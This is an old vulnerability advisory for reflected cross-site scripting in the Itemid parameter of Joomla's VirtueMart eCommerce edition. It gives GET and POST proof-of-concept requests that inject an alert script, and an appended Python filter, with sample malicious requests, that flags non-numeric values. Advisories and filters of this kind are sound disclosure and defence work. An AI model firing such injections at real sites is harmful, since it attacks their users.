Bug: VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities ( Ascii Version )


Published: 2006.10.03
Credit: Adrian Castro
Risk: Low
CWE: CWE-79
CVE: CVE-2006-5096
Local: No
Remote: Yes

CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities

Status: Reported to the Vendor [09/26/2006]
Class: Input Validation Error
Severity: Low

Software Description:
*****************************************************************************
VirtueMart (formerly known as mambo-phpShop) is an Open Source
E-Commerce solution to be used together with a Content Management
System (CMS) called Joomla!

Vulnerability Description:
*****************************************************************************
Multiple cross-site scripting vulnerabilities exist in the Joomla
eCommerce edition software provided by VirtueMart.

Vulnerable Software:
*****************************************************************************
Joomla 1.0.11 eCommerce Edition (prior versions may also be vulnerable)

Exploit:
*****************************************************************************
GET: index.php
option=com_contact&Itemid="><script>alert('XSS');</script>
POST: index.php
subscriber_name=1&email=1&task=subscribe&Itemid="><script>alert('XSS');</script>

Solution:
*****************************************************************************

None at this time.
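
Added example (not part of the original advisory, and not VirtueMart or Joomla code): a request filter for the Itemid parameter shown in the Exploit section, usable as a log check or virtual patch while no vendor fix exists. It assumes Itemid only ever carries a numeric menu-item id; the function names and sample requests are constructed for illustration.

```python
import html
from urllib.parse import parse_qs, urlsplit

PARAM = "Itemid"  # parameter named in the advisory

def itemid_values(url, body=""):
    """Collect every Itemid value from the query string and a form-encoded body."""
    values = []
    for raw in (urlsplit(url).query, body):
        # parse_qs percent-decodes values; keep blanks so an empty Itemid is seen too
        values.extend(parse_qs(raw, keep_blank_values=True).get(PARAM, []))
    return values

def is_suspicious(url, body=""):
    """True when any Itemid value is not a plain ASCII decimal integer.
    Assumption: Itemid only ever carries a numeric menu-item id."""
    return any(not (v.isascii() and v.isdigit()) for v in itemid_values(url, body))

def encode_for_html(value):
    """Output encoding for the case where the value must be echoed into markup."""
    return html.escape(value, quote=True)

# Constructed sample requests: (method, url, body)
SAMPLES = [
    ("GET", "/index.php?option=com_contact&Itemid=3", ""),
    ("GET", "/index.php?option=com_contact"
            "&Itemid=%22%3E%3Cscript%3Ealert('XSS');%3C/script%3E", ""),
    ("POST", "/index.php",
     "subscriber_name=1&email=1&task=subscribe"
     "&Itemid=\"><script>alert('XSS');</script>"),
    ("GET", "/index.php?Itemid=3&Itemid=%22%3E%3Cb%3E", ""),  # repeated parameter
]

def scan(samples):
    """Return the indexes of the samples that should be blocked or logged."""
    return [i for i, (_, url, body) in enumerate(samples) if is_suspicious(url, body)]

if __name__ == "__main__":
    print(scan(SAMPLES))
```

Rejecting non-numeric Itemid values covers both the GET and POST cases listed above; encoding on output remains necessary wherever the application writes request data into a page.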

Credits:
*****************************************************************************
Discovered by Adrian Castro

Copyright 2014, cxsecurity.com